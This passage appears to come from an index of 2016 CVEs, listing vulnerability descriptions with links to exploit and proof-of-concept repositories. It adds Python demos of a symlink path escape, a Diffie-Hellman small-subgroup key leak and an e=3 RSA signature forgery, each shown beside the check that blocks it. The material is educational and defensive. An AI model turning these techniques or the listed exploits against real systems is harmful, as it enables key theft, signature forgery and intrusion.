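    root = os.path.normpath(volume_root)
    joined = os.path.normpath(os.path.join(root, sub_path))
    return joined == root or joined.startswith(root + os.sep)

def resolved_accepts(volume_root, sub_path):
    """Resolve symlinks first, then require the real target to stay under the
    real volume root."""
    root = os.path.realpath(volume_root)
    target = os.path.realpath(os.path.join(root, sub_path))
    return os.path.commonpath([root, target]) == root

def demo():
    """Build a volume with a symlink planted by an unprivileged pod and report
    what each check says about the subPaths a pod might request."""
    with tempfile.TemporaryDirectory() as tmp:
        host_dir = os.path.join(tmp, "host-etc")   # stands in for a host path
        volume = os.path.join(tmp, "volume")
        os.mkdir(host_dir)
        os.mkdir(volume)
        os.symlink(host_dir, os.path.join(volume, "escape"))   # pod-created
        return {
            "symlink_naive": naive_accepts(volume, "escape"),
            "symlink_resolved": resolved_accepts(volume, "escape"),
            "plain_dir_resolved": resolved_accepts(volume, "data"),
            "dotdot": (naive_accepts(volume, "../host-etc"),
                       resolved_accepts(volume, "../host-etc")),
        }

if __name__ == "__main__":
    for k, v in demo().items():
        print(f"{k}: {v}")
```

The string check catches a literal `../` but accepts the symlink; the resolved check rejects the symlink and still accepts an ordinary directory inside the volume.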

## 2016
### CVE-2016-0034 (2016-01-13)

Microsoft Silverlight 5 before 5.1.41212.0 mishandles negative offsets during decoding, which allows remote attackers to execute arbitrary code or cause a denial of service (object-header corruption) via a crafted web site, aka "Silverlight Runtime Remote Code Execution Vulnerability."

- [hybridious/CVE-2016-0034-Decompile](https://github.com/hybridious/CVE-2016-0034-Decompile)

### CVE-2016-0040 (2016-02-10)

The kernel in Microsoft Windows Vista SP2, Windows Server 2008 SP2 and R2 SP1, and Windows 7 SP1 allows local users to gain privileges via a crafted application, aka "Windows Elevation of Privilege Vulnerability."

- [Rootkitsmm-zz/cve-2016-0040](https://github.com/Rootkitsmm-zz/cve-2016-0040)
- [de7ec7ed/CVE-2016-0040](https://github.com/de7ec7ed/CVE-2016-0040)

### CVE-2016-0049 (2016-02-10)

Kerberos in Microsoft Windows Vista SP2, Windows Server 2008 SP2 and R2 SP1, Windows 7 SP1, Windows 8.1, Windows Server 2012 Gold and R2, and Windows 10 Gold and 1511 does not properly validate password changes, which allows remote attackers to bypass authentication by deploying a crafted Key Distribution Center (KDC) and then performing a sign-in action, aka "Windows Kerberos Security Feature Bypass."

- [JackOfMostTrades/bluebox](https://github.com/JackOfMostTrades/bluebox)

### CVE-2016-0051 (2016-02-10)

The WebDAV client in Microsoft Windows Vista SP2, Windows Server 2008 SP2 and R2 SP1, Windows 7 SP1, Windows 8.1, Windows Server 2012 Gold and R2, Windows RT 8.1, and Windows 10 Gold and 1511 allows local users to gain privileges via a crafted application, aka "WebDAV Elevation of Privilege Vulnerability."

- [koczkatamas/CVE-2016-0051](https://github.com/koczkatamas/CVE-2016-0051)
- [hexx0r/CVE-2016-0051](https://github.com/hexx0r/CVE-2016-0051)
- [ganrann/CVE-2016-0051](https://github.com/ganrann/CVE-2016-0051)

### CVE-2016-0095 (2016-03-09)

The kernel-mode driver in Microsoft Windows Vista SP2, Windows Server 2008 SP2 and R2 SP1, Windows 7 SP1, Windows 8.1, Windows Server 2012 Gold and R2, Windows RT 8.1, and Windows 10 Gold and 1511 allows local users to gain privileges via a crafted application, aka "Win32k Elevation of Privilege Vulnerability," a different vulnerability than CVE-2016-0093, CVE-2016-0094, and CVE-2016-0096.

- [fengjixuchui/cve-2016-0095-x64](https://github.com/fengjixuchui/cve-2016-0095-x64)

### CVE-2016-0099 (2016-03-09)

The Secondary Logon Service in Microsoft Windows Vista SP2, Windows Server 2008 SP2 and R2 SP1, Windows 7 SP1, Windows 8.1, Windows Server 2012 Gold and R2, Windows RT 8.1, and Windows 10 Gold and 1511 does not properly process request handles, which allows local users to gain privileges via a crafted application, aka "Secondary Logon Elevation of Privilege Vulnerability."

- [zcgonvh/MS16-032](https://github.com/zcgonvh/MS16-032)

### CVE-2016-010033
- [zi0Black/CVE-2016-010033-010045](https://github.com/zi0Black/CVE-2016-010033-010045)

### CVE-2016-0189 (2016-05-11)

The Microsoft (1) JScript 5.8 and (2) VBScript 5.7 and 5.8 engines, as used in Internet Explorer 9 through 11 and other products, allow remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Scripting Engine Memory Corruption Vulnerability," a different vulnerability than CVE-2016-0187.

- [theori-io/cve-2016-0189](https://github.com/theori-io/cve-2016-0189)
- [deamwork/MS16-051-poc](https://github.com/deamwork/MS16-051-poc)

### CVE-2016-0199 (2016-06-16)

Microsoft Internet Explorer 9 through 11 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability," a different vulnerability than CVE-2016-0200 and CVE-2016-3211.

- [LeoonZHANG/CVE-2016-0199](https://github.com/LeoonZHANG/CVE-2016-0199)

### CVE-2016-0451 (2016-01-21)

Unspecified vulnerability in the Oracle GoldenGate component in Oracle GoldenGate 11.2 and 12.1.2 allows remote attackers to affect confidentiality, integrity, and availability via unknown vectors, a different vulnerability than CVE-2016-0452.

- [rwincey/Oracle-GoldenGate---CVE-2016-0451](https://github.com/rwincey/Oracle-GoldenGate---CVE-2016-0451)

### CVE-2016-0638 (2016-04-21)

Unspecified vulnerability in the Oracle WebLogic Server component in Oracle Fusion Middleware 10.3.6, 12.1.2, 12.1.3, and 12.2.1 allows remote attackers to affect confidentiality, integrity, and availability via vectors related to Java Messaging Service.

- [0xn0ne/weblogicScanner](https://github.com/0xn0ne/weblogicScanner)
- [zhzhdoai/Weblogic_Vuln](https://github.com/zhzhdoai/Weblogic_Vuln)
- [BabyTeam1024/CVE-2016-0638](https://github.com/BabyTeam1024/CVE-2016-0638)

### CVE-2016-0701 (2016-02-15)

The DH_check_pub_key function in crypto/dh/dh_check.c in OpenSSL 1.0.2 before 1.0.2f does not ensure that prime numbers are appropriate for Diffie-Hellman (DH) key exchange, which makes it easier for remote attackers to discover a private DH exponent by making multiple handshakes with a peer that chose an inappropriate number, as demonstrated by a number in an X9.42 file.

- [luanjampa/cve-2016-0701](https://github.com/luanjampa/cve-2016-0701)
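
The attack behind this entry is small-subgroup confinement: if p - 1 has a small factor r and the peer's public value is not checked, an attacker can send an element of order r, and the victim's shared secret then leaks the private exponent modulo r; repeating with each small factor and combining by CRT recovers a static exponent. The example below is added here and is not OpenSSL code or the PoC above: it uses a toy prime with p - 1 = 2·q·r, shows the leak against an unchecked exponent, and shows the check DH_check_pub_key() gained in 1.0.2f when q is known (1 < y < p - 1 and y^q ≡ 1 mod p) rejecting the bad value while accepting an honest one. The group parameters are toy-sized on purpose.

```python
"""Added example: small-subgroup confinement against an unchecked DH peer key."""

def is_prime(n):
    """Trial division; fine for the toy sizes used here."""
    if n < 2:
        return False
    f = 2
    while f * f <= n:
        if n % f == 0:
            return False
        f += 1
    return True

# Toy group: p - 1 = 2 * Q * R.  DH is meant to run in the order-Q subgroup;
# the small factor R gives an attacker a subgroup to confine the secret to.
P, Q, R = 10091, 1009, 5
assert is_prime(P) and is_prime(Q) and is_prime(R) and P - 1 == 2 * Q * R

def element_of_order(n):
    """An element of exact order n (n a prime dividing P - 1)."""
    for h in range(2, P):
        y = pow(h, (P - 1) // n, P)
        if y != 1:
            return y
    raise ValueError("no element of that order")

G = element_of_order(Q)   # honest generator of the order-Q subgroup

def validate_public_key(y, p=P, q=Q):
    """1 < y < p - 1 and y^q == 1 mod p: y lies in the intended subgroup."""
    return 1 < y < p - 1 and pow(y, q, p) == 1

def shared_secret(peer_pub, x, check):
    """Victim side: peer_pub^x, with or without validating peer_pub."""
    if check and not validate_public_key(peer_pub):
        raise ValueError("peer public key is not in the order-q subgroup")
    return pow(peer_pub, x, P)

def recover_x_mod_r(y_bad, secret):
    """Attacker side: with y_bad of order R the secret takes only R values,
    one per residue of x mod R, so a single observation pins x mod R down."""
    for k in range(R):
        if pow(y_bad, k, P) == secret:
            return k
    raise RuntimeError("secret not in the order-R subgroup")

def demo(x=777):
    """x is the victim's static private exponent.  Returns what leaks without
    the check, whether the check blocks the bad key, and that an honest key
    still passes."""
    y_bad = element_of_order(R)
    leaked = recover_x_mod_r(y_bad, shared_secret(y_bad, x, check=False))
    try:
        shared_secret(y_bad, x, check=True)
        blocked = False
    except ValueError:
        blocked = True
    honest_ok = validate_public_key(pow(G, 123, P))
    return {"leaked": leaked, "x_mod_r": x % R, "blocked": blocked, "honest_key_ok": honest_ok}

if __name__ == "__main__":
    print(demo())
```

With a real X9.42 parameter set the same check needs q, which is why the CVE text mentions X9.42 files: without q the implementation cannot tell an order-r element from a legitimate one.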

### CVE-2016-0702 (2016-03-03)

The MOD_EXP_CTIME_COPY_FROM_PREBUF function in crypto/bn/bn_exp.c in OpenSSL 1.0.1 before 1.0.1s and 1.0.2 before 1.0.2g does not properly consider cache-bank access times during modular exponentiation, which makes it easier for local users to discover RSA keys by running a crafted application on the same Intel Sandy Bridge CPU core as a victim and leveraging cache-bank conflicts, aka a "CacheBleed" attack.

- [Trinadh465/OpenSSL-1_0_1g_CVE-2016-0702](https://github.com/Trinadh465/OpenSSL-1_0_1g_CVE-2016-0702)

### CVE-2016-0705 (2016-03-03)

Double free vulnerability in the dsa_priv_decode function in crypto/dsa/dsa_ameth.c in OpenSSL 1.0.1 before 1.0.1s and 1.0.2 before 1.0.2g allows remote attackers to cause a denial of service (memory corruption) or possibly have unspecified other impact via a malformed DSA private key.

- [hshivhare67/OpenSSL_1.0.1g_CVE-2016-0705](https://github.com/hshivhare67/OpenSSL_1.0.1g_CVE-2016-0705)

### CVE-2016-0728 (2016-02-08)

The join_session_keyring function in security/keys/process_keys.c in the Linux kernel before 4.4.1 mishandles object references in a certain error case, which allows local users to gain privileges or cause a denial of service (integer overflow and use-after-free) via crafted keyctl commands.

- [idl3r/cve-2016-0728](https://github.com/idl3r/cve-2016-0728)
- [kennetham/cve_2016_0728](https://github.com/kennetham/cve_2016_0728)
- [nardholio/cve-2016-0728](https://github.com/nardholio/cve-2016-0728)
- [googleweb/CVE-2016-0728](https://github.com/googleweb/CVE-2016-0728)
- [neuschaefer/cve-2016-0728-testbed](https://github.com/neuschaefer/cve-2016-0728-testbed)
- [bittorrent3389/cve-2016-0728](https://github.com/bittorrent3389/cve-2016-0728)
- [sibilleg/exploit_cve-2016-0728](https://github.com/sibilleg/exploit_cve-2016-0728)
- [hal0taso/CVE-2016-0728](https://github.com/hal0taso/CVE-2016-0728)
- [sugarvillela/CVE](https://github.com/sugarvillela/CVE)
- [th30d00r/Linux-Vulnerability-CVE-2016-0728-and-Exploit](https://github.com/th30d00r/Linux-Vulnerability-CVE-2016-0728-and-Exploit)
- [tndud042713/cve](https://github.com/tndud042713/cve)
- [sidrk01/cve-2016-0728](https://github.com/sidrk01/cve-2016-0728)

### CVE-2016-0752 (2016-02-16)

Directory traversal vulnerability in Action View in Ruby on Rails before 3.2.22.1, 4.0.x and 4.1.x before 4.1.14.1, 4.2.x before 4.2.5.1, and 5.x before 5.0.0.beta1.1 allows remote attackers to read arbitrary files by leveraging an application's unrestricted use of the render method and providing a .. (dot dot) in a pathname.

- [forced-request/rails-rce-cve-2016-0752](https://github.com/forced-request/rails-rce-cve-2016-0752)
- [dachidahu/CVE-2016-0752](https://github.com/dachidahu/CVE-2016-0752)

### CVE-2016-0792 (2016-04-07)

Multiple unspecified API endpoints in Jenkins before 1.650 and LTS before 1.642.2 allow remote authenticated users to execute arbitrary code via serialized data in an XML file, related to XStream and groovy.util.Expando.

- [jpiechowka/jenkins-cve-2016-0792](https://github.com/jpiechowka/jenkins-cve-2016-0792)
- [Aviksaikat/CVE-2016-0792](https://github.com/Aviksaikat/CVE-2016-0792)

### CVE-2016-0793 (2016-04-01)

Incomplete blacklist vulnerability in the servlet filter restriction mechanism in WildFly (formerly JBoss Application Server) before 10.0.0.Final on Windows allows remote attackers to read the sensitive files in the (1) WEB-INF or (2) META-INF directory via a request that contains (a) lowercase or (b) "meaningless" characters.

- [tafamace/CVE-2016-0793](https://github.com/tafamace/CVE-2016-0793)

### CVE-2016-0800 (2016-03-01)

The SSLv2 protocol, as used in OpenSSL before 1.0.1s and 1.0.2 before 1.0.2g and other products, requires a server to send a ServerVerify message before establishing that a client possesses certain plaintext RSA data, which makes it easier for remote attackers to decrypt TLS ciphertext data by leveraging a Bleichenbacher RSA padding oracle, aka a "DROWN" attack.

- [anthophilee/A2SV--SSL-VUL-Scan](https://github.com/anthophilee/A2SV--SSL-VUL-Scan)

### CVE-2016-0801 (2016-02-07)

The Broadcom Wi-Fi driver in the kernel in Android 4.x before 4.4.4, 5.x before 5.1.1 LMY49G, and 6.x before 2016-02-01 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via crafted wireless control message packets, aka internal bug 25662029.

- [abdsec/CVE-2016-0801](https://github.com/abdsec/CVE-2016-0801)
- [zsaurus/CVE-2016-0801-test](https://github.com/zsaurus/CVE-2016-0801-test)

### CVE-2016-0805 (2016-02-07)

The performance event manager for Qualcomm ARM processors in Android 4.x before 4.4.4, 5.x before 5.1.1 LMY49G, and 6.x before 2016-02-01 allows attackers to gain privileges via a crafted application, aka internal bug 25773204.

- [hulovebin/cve-2016-0805](https://github.com/hulovebin/cve-2016-0805)

### CVE-2016-0846 (2016-04-18)

libs/binder/IMemory.cpp in the IMemory Native Interface in Android 4.x before 4.4.4, 5.0.x before 5.0.2, 5.1.x before 5.1.1, and 6.x before 2016-04-01 does not properly consider the heap size, which allows attackers to gain privileges via a crafted application, as demonstrated by obtaining Signature or SignatureOrSystem access, aka internal bug 26877992.

- [secmob/CVE-2016-0846](https://github.com/secmob/CVE-2016-0846)
- [b0b0505/CVE-2016-0846-PoC](https://github.com/b0b0505/CVE-2016-0846-PoC)

### CVE-2016-0974 (2016-02-10)

Use-after-free vulnerability in Adobe Flash Player before 18.0.0.329 and 19.x and 20.x before 20.0.0.306 on Windows and OS X and before 11.2.202.569 on Linux, Adobe AIR before 20.0.0.260, Adobe AIR SDK before 20.0.0.260, and Adobe AIR SDK & Compiler before 20.0.0.260 allows attackers to execute arbitrary code via unspecified vectors, a different vulnerability than CVE-2016-0973, CVE-2016-0975, CVE-2016-0982, CVE-2016-0983, and CVE-2016-0984.

- [Fullmetal5/FlashHax](https://github.com/Fullmetal5/FlashHax)

### CVE-2016-1240 (2016-10-03)

The Tomcat init script in the tomcat7 package before 7.0.56-3+deb8u4 and tomcat8 package before 8.0.14-1+deb8u3 on Debian jessie and the tomcat6 and libtomcat6-java packages before 6.0.35-1ubuntu3.8 on Ubuntu 12.04 LTS, the tomcat7 and libtomcat7-java packages before 7.0.52-1ubuntu0.7 on Ubuntu 14.04 LTS, and tomcat8 and libtomcat8-java packages before 8.0.32-1ubuntu1.2 on Ubuntu 16.04 LTS allows local users with access to the tomcat account to gain root privileges via a symlink attack on the Catalina log file, as demonstrated by /var/log/tomcat7/catalina.out.

- [Naramsim/Offensive](https://github.com/Naramsim/Offensive)
- [mhe18/CVE_Project](https://github.com/mhe18/CVE_Project)

### CVE-2016-1287 (2016-02-11)

Buffer overflow in the IKEv1 and IKEv2 implementations in Cisco ASA Software before 8.4(7.30), 8.7 before 8.7(1.18), 9.0 before 9.0(4.38), 9.1 before 9.1(7), 9.2 before 9.2(4.5), 9.3 before 9.3(3.7), 9.4 before 9.4(2.4), and 9.5 before 9.5(2.2) on ASA 5500 devices, ASA 5500-X devices, ASA Services Module for Cisco Catalyst 6500 and Cisco 7600 devices, ASA 1000V devices, Adaptive Security Virtual Appliance (aka ASAv), Firepower 9300 ASA Security Module, and ISA 3000 devices allows remote attackers to execute arbitrary code or cause a denial of service (device reload) via crafted UDP packets, aka Bug IDs CSCux29978 and CSCux42019.

- [jgajek/killasa](https://github.com/jgajek/killasa)
- [NetSPI/asa_tools](https://github.com/NetSPI/asa_tools)

### CVE-2016-1494 (2016-01-13)

The verify function in the RSA package for Python (Python-RSA) before 3.3 allows attackers to spoof signatures with a small public exponent via crafted signature padding, aka a BERserk attack.

- [matthiasbe/secuimag3a](https://github.com/matthiasbe/secuimag3a)
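
Since the vulnerable library is itself Python, the flaw and the fix are easiest to show in Python. The example below is added here and is not Python-RSA's code or the PoC above: it generates a seeded toy RSA key with e = 3, implements a verify() in the shape of the pre-3.3 one (unpad, then compare only the DigestInfo that follows, ignoring trailing bytes) beside a strict verify() that rebuilds the whole expected block, and forges a signature with Bleichenbacher's cube-root trick. The prime generation and key sizes are this example's choices, not the library's.

```python
"""Added example: lenient vs strict PKCS#1 v1.5 verification and an e = 3 forgery.
Key material is generated from a fixed seed; nothing here comes from a real key."""
import hashlib
import hmac
import random

SHA256_DIGESTINFO = bytes.fromhex("3031300d060960864801650304020105000420")  # RFC 8017 9.2

def is_probable_prime(n, rng, rounds=16):
    """Trial division by small primes, then Miller-Rabin."""
    for sp in (2, 3, 5, 7, 11, 13, 17, 19, 23, 29, 31, 37):
        if n % sp == 0:
            return n == sp
    d, s = n - 1, 0
    while d % 2 == 0:
        d, s = d // 2, s + 1
    for _ in range(rounds):
        x = pow(rng.randrange(2, n - 1), d, n)
        if x in (1, n - 1):
            continue
        for _ in range(s - 1):
            x = pow(x, 2, n)
            if x == n - 1:
                break
        else:
            return False
    return True

def gen_prime(bits, rng):
    while True:
        c = rng.getrandbits(bits) | (1 << (bits - 1)) | 1
        if c % 3 == 2 and is_probable_prime(c, rng):   # p = 2 mod 3 keeps e = 3 invertible
            return c

def keygen(bits=2048, seed=20160113):
    rng = random.Random(seed)
    p, q = gen_prime(bits // 2, rng), gen_prime(bits // 2, rng)
    return p * q, 3, pow(3, -1, (p - 1) * (q - 1))

def byte_len(n):
    return (n.bit_length() + 7) // 8

def emsa_pkcs1_v15(msg, k):
    t = SHA256_DIGESTINFO + hashlib.sha256(msg).digest()
    return b"\x00\x01" + b"\xff" * (k - len(t) - 3) + b"\x00" + t

def sign(msg, n, d):
    m = int.from_bytes(emsa_pkcs1_v15(msg, byte_len(n)), "big")
    return pow(m, d, n).to_bytes(byte_len(n), "big")

def verify_lenient(msg, sig, n, e):
    """Pre-3.3 shape: strip 00 01 FF..FF 00, then compare only the DigestInfo
    that follows.  Whatever comes after it is never examined."""
    block = pow(int.from_bytes(sig, "big"), e, n).to_bytes(byte_len(n), "big")
    if block[:2] != b"\x00\x01":
        return False
    i = 2
    while i < len(block) and block[i] == 0xFF:
        i += 1
    if i >= len(block) or block[i] != 0x00:
        return False
    expected = SHA256_DIGESTINFO + hashlib.sha256(msg).digest()
    return block[i + 1:i + 1 + len(expected)] == expected

def verify_strict(msg, sig, n, e):
    """3.3 fix: rebuild the entire expected block and compare every byte."""
    block = pow(int.from_bytes(sig, "big"), e, n).to_bytes(byte_len(n), "big")
    return hmac.compare_digest(block, emsa_pkcs1_v15(msg, byte_len(n)))

def icbrt_ceil(x):
    """Smallest integer s with s**3 >= x."""
    lo, hi = 0, 1 << ((x.bit_length() + 2) // 3 + 1)
    while lo < hi:
        mid = (lo + hi) // 2
        lo, hi = (mid + 1, hi) if mid ** 3 < x else (lo, mid)
    return lo

def forge(msg, n, e=3):
    """Put the shortest padding the lenient parser accepts plus the DigestInfo
    at the top of the block, zeros below, and take the integer cube root: s**3
    overshoots only into the zero region, never into the prefix (e must be 3
    and the prefix well under a third of the modulus, both true here)."""
    k = byte_len(n)
    prefix = b"\x00\x01\xff\x00" + SHA256_DIGESTINFO + hashlib.sha256(msg).digest()
    target = int.from_bytes(prefix + b"\x00" * (k - len(prefix)), "big")
    return icbrt_ceil(target).to_bytes(k, "big")

def demo(msg=b"transfer 100 to mallory"):
    n, e, d = keygen()
    genuine, forged = sign(msg, n, d), forge(msg, n, e)
    return {"genuine_strict": verify_strict(msg, genuine, n, e),
            "genuine_lenient": verify_lenient(msg, genuine, n, e),
            "forged_lenient": verify_lenient(msg, forged, n, e),
            "forged_strict": verify_strict(msg, forged, n, e)}

if __name__ == "__main__":
    print(demo())
```

The forged value never touches the private key: it is computed from n and e alone, which is why a lenient verifier is a complete break for any e = 3 key it trusts.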

### CVE-2016-1531 (2016-04-07)

Exim before 4.86.2, when installed setuid root, allows local users to gain privileges via the perl_startup argument.

- [h3xcr4ck3r/CVE-2016-1531](https://github.com/h3xcr4ck3r/CVE-2016-1531)

### CVE-2016-1542 (2016-06-13)

The RPC API in RSCD agent in BMC BladeLogic Server Automation (BSA) 8.2.x, 8.3.x, 8.5.x, 8.6.x, and 8.7.x on Linux and UNIX allows remote attackers to bypass authorization and enumerate users by sending an action packet to xmlrpc after an authorization failure.

- [patriknordlen/bladelogic_bmc-cve-2016-1542](https://github.com/patriknordlen/bladelogic_bmc-cve-2016-1542)
- [bao7uo/bmc_bladelogic](https://github.com/bao7uo/bmc_bladelogic)

### CVE-2016-1555 (2017-04-21)

(1) boardData102.php, (2) boardData103.php, (3) boardDataJP.php, (4) boardDataNA.php, and (5) boardDataWW.php in Netgear WN604 before 3.3.3 and WN802Tv2, WNAP210v2, WNAP320, WNDAP350, WNDAP360, and WNDAP660 before 3.5.5.0 allow remote attackers to execute arbitrary commands.

- [ide0x90/cve-2016-1555](https://github.com/ide0x90/cve-2016-1555)

### CVE-2016-1734 (2016-03-24)

AppleUSBNetworking in Apple iOS before 9.3 and OS X before 10.11.4 allows physically proximate attackers to execute arbitrary code in a privileged context or cause a denial of service (memory corruption) via a crafted USB device.

- [Manouchehri/CVE-2016-1734](https://github.com/Manouchehri/CVE-2016-1734)

### CVE-2016-1757 (2016-03-24)

Race condition in the kernel in Apple iOS before 9.3 and OS X before 10.11.4 allows attackers to execute arbitrary code in a privileged context via a crafted app.

- [gdbinit/mach_race](https://github.com/gdbinit/mach_race)

### CVE-2016-1764 (2016-03-24)

The Content Security Policy (CSP) implementation in Messages in Apple OS X before 10.11.4 allows remote attackers to obtain sensitive information via a javascript: URL.

- [moloch--/cve-2016-1764](https://github.com/moloch--/cve-2016-1764)

### CVE-2016-1825 (2016-05-20)

IOHIDFamily in Apple OS X before 10.11.5 allows attackers to execute arbitrary code in a privileged context or cause a denial of service (memory corruption) via a crafted app.

- [bazad/physmem](https://github.com/bazad/physmem)

### CVE-2016-1827 (2016-05-20)

The kernel in Apple iOS before 9.3.2, OS X before 10.11.5, tvOS before 9.2.1, and watchOS before 2.2.1 allows attackers to execute arbitrary code in a privileged context or cause a denial of service (memory corruption) via a crafted app, a different vulnerability than CVE-2016-1828, CVE-2016-1829, and CVE-2016-1830.

- [bazad/flow_divert-heap-overflow](https://github.com/bazad/flow_divert-heap-overflow)
- [superMan7912002/bazad3](https://github.com/superMan7912002/bazad3)

### CVE-2016-1828 (2016-05-20)

The kernel in Apple iOS before 9.3.2, OS X before 10.11.5, tvOS before 9.2.1, and watchOS before 2.2.1 allows attackers to execute arbitrary code in a privileged context or cause a denial of service (memory corruption) via a crafted app, a different vulnerability than CVE-2016-1827, CVE-2016-1829, and CVE-2016-1830.

- [bazad/rootsh](https://github.com/bazad/rootsh)
- [berritus163t/bazad5](https://github.com/berritus163t/bazad5)
- [SideGreenHand100/bazad5](https://github.com/SideGreenHand100/bazad5)
- [zqlblingzs/bazad5](https://github.com/zqlblingzs/bazad5)

### CVE-2016-2004 (2016-04-21)

HPE Data Protector before 7.03_108, 8.x before 8.15, and 9.x before 9.06 allows remote attackers to execute arbitrary code via unspecified vectors related to lack of authentication. NOTE: this vulnerability exists because of an incomplete fix for CVE-2014-2623.

- [marcocarolasec/CVE-2016-2004-Exploit](https://github.com/marcocarolasec/CVE-2016-2004-Exploit)

### CVE-2016-2067 (2016-07-11)

drivers/gpu/msm/kgsl.c in the MSM graphics driver (aka GPU driver) for the Linux kernel 3.x, as used in Qualcomm Innovation Center (QuIC) Android contributions for MSM devices and other products, mishandles the KGSL_MEMFLAGS_GPUREADONLY flag, which allows attackers to gain privileges by leveraging accidental read-write mappings, aka Qualcomm internal bug CR988993.

- [hhj4ck/CVE-2016-2067](https://github.com/hhj4ck/CVE-2016-2067)

### CVE-2016-2098 (2016-04-07)

Action Pack in Ruby on Rails before 3.2.22.2, 4.x before 4.1.14.2, and 4.2.x before 4.2.5.2 allows remote attackers to execute arbitrary Ruby code by leveraging an application's unrestricted use of the render method.

- [hderms/dh-CVE_2016_2098](https://github.com/hderms/dh-CVE_2016_2098)
- [CyberDefenseInstitute/PoC_CVE-2016-2098_Rails42](https://github.com/CyberDefenseInstitute/PoC_CVE-2016-2098_Rails42)
- [Alejandro-MartinG/rails-PoC-CVE-2016-2098](https://github.com/Alejandro-MartinG/rails-PoC-CVE-2016-2098)
- [0x00-0x00/CVE-2016-2098](https://github.com/0x00-0x00/CVE-2016-2098)
- [its-arun/CVE-2016-2098](https://github.com/its-arun/CVE-2016-2098)
- [3rg1s/CVE-2016-2098](https://github.com/3rg1s/CVE-2016-2098)
- [DanielHemmati/CVE-2016-2098-my-first-exploit](https://github.com/DanielHemmati/CVE-2016-2098-my-first-exploit)
- [Debalinax64/CVE-2016-2098](https://github.com/Debalinax64/CVE-2016-2098)
- [j4k0m/CVE-2016-2098](https://github.com/j4k0m/CVE-2016-2098)
- [Shakun8/CVE-2016-2098](https://github.com/Shakun8/CVE-2016-2098)
- [JoseLRC97/Ruby-on-Rails-ActionPack-Inline-ERB-Remote-Code-Execution](https://github.com/JoseLRC97/Ruby-on-Rails-ActionPack-Inline-ERB-Remote-Code-Execution)

### CVE-2016-2107 (2016-05-05)

The AES-NI implementation in OpenSSL before 1.0.1t and 1.0.2 before 1.0.2h does not consider memory allocation during a certain padding check, which allows remote attackers to obtain sensitive cleartext information via a padding-oracle attack against an AES CBC session. NOTE: this vulnerability exists because of an incorrect fix for CVE-2013-0169.

- [FiloSottile/CVE-2016-2107](https://github.com/FiloSottile/CVE-2016-2107)
- [tmiklas/docker-cve-2016-2107](https://github.com/tmiklas/docker-cve-2016-2107)

### CVE-2016-2118 (2016-04-12)

The MS-SAMR and MS-LSAD protocol implementations in Samba 3.x and 4.x before 4.2.11, 4.3.x before 4.3.8, and 4.4.x before 4.4.2 mishandle DCERPC connections, which allows man-in-the-middle attackers to perform protocol-downgrade attacks and impersonate users by modifying the client-server data stream, aka "BADLOCK."

- [nickanderson/cfengine-CVE-2016-2118](https://github.com/nickanderson/cfengine-CVE-2016-2118)

### CVE-2016-2173 (2017-04-21)

org.springframework.core.serializer.DefaultDeserializer in Spring AMQP before 1.5.5 allows remote attackers to execute arbitrary code.

- [HaToan/CVE-2016-2173](https://github.com/HaToan/CVE-2016-2173)

### CVE-2016-2233 (2017-01-18)

Stack-based buffer overflow in the inbound_cap_ls function in common/inbound.c in HexChat 2.10.2 allows remote IRC servers to cause a denial of service (crash) via a large number of options in a CAP LS message.

- [fath0218/CVE-2016-2233](https://github.com/fath0218/CVE-2016-2233)

### CVE-2016-2334 (2016-12-13)

Heap-based buffer overflow in the NArchive::NHfs::CHandler::ExtractZlibFile method in 7zip before 16.00 and p7zip allows remote attackers to execute arbitrary code via a crafted HFS+ image.

- [icewall/CVE-2016-2334](https://github.com/icewall/CVE-2016-2334)

### CVE-2016-2338 (2020-02-14)

An exploitable heap overflow vulnerability exists in the Psych::Emitter start_document function of Ruby. In Psych::Emitter start_document, the heap buffer "head" is allocated based on the length of the tags array. A specially constructed object passed as an element of the tags array can grow the array after that allocation and cause a heap overflow.

- [SpiralBL0CK/CVE-2016-2338-nday](https://github.com/SpiralBL0CK/CVE-2016-2338-nday)

### CVE-2016-2386 (2016-02-16)

SQL injection vulnerability in the UDDI server in SAP NetWeaver J2EE Engine 7.40 allows remote attackers to execute arbitrary SQL commands via unspecified vectors, aka SAP Security Note 2101079.

- [murataydemir/CVE-2016-2386](https://github.com/murataydemir/CVE-2016-2386)

### CVE-2016-2402 (2017-01-30)

OkHttp before 2.7.4 and 3.x before 3.1.2 allows man-in-the-middle attackers to bypass certificate pinning by sending a certificate chain with a certificate from a non-pinned trusted CA and the pinned certificate.

- [ikoz/cert-pinning-flaw-poc](https://github.com/ikoz/cert-pinning-flaw-poc)
- [ikoz/certPinningVulnerableOkHttp](https://github.com/ikoz/certPinningVulnerableOkHttp)

### CVE-2016-2431 (2016-05-09)

The Qualcomm TrustZone component in Android before 2016-05-01 on Nexus 5, Nexus 6, Nexus 7 (2013), and Android One devices allows attackers to gain privileges via a crafted application, aka internal bug 24968809.

- [laginimaineb/cve-2016-2431](https://github.com/laginimaineb/cve-2016-2431)
- [laginimaineb/ExtractKeyMaster](https://github.com/laginimaineb/ExtractKeyMaster)

### CVE-2016-2434 (2016-05-09)

The NVIDIA video driver in Android before 2016-05-01 on Nexus 9 devices allows attackers to gain privileges via a crafted application, aka internal bug 27251090.

- [jianqiangzhao/CVE-2016-2434](https://github.com/jianqiangzhao/CVE-2016-2434)

### CVE-2016-2468 (2016-06-13)

The Qualcomm GPU driver in Android before 2016-06-01 on Nexus 5, 5X, 6, 6P, and 7 devices allows attackers to gain privileges via a crafted application, aka internal bug 27475454.

- [gitcollect/CVE-2016-2468](https://github.com/gitcollect/CVE-2016-2468)

### CVE-2016-2555 (2017-04-13)

SQL injection vulnerability in include/lib/mysql_connect.inc.php in ATutor 2.2.1 allows remote attackers to execute arbitrary SQL commands via the searchFriends function to friends.inc.php.

- [shadofren/CVE-2016-2555](https://github.com/shadofren/CVE-2016-2555)
- [maximilianmarx/atutor-blind-sqli](https://github.com/maximilianmarx/atutor-blind-sqli)

### CVE-2016-2569 (2016-02-27)

Squid 3.x before 3.5.15 and 4.x before 4.0.7 does not properly append data to String objects, which allows remote servers to cause a denial of service (assertion failure and daemon exit) via a long string, as demonstrated by a crafted HTTP Vary header.

- [amit-raut/CVE-2016-2569](https://github.com/amit-raut/CVE-2016-2569)

### CVE-2016-2776 (2016-09-28)

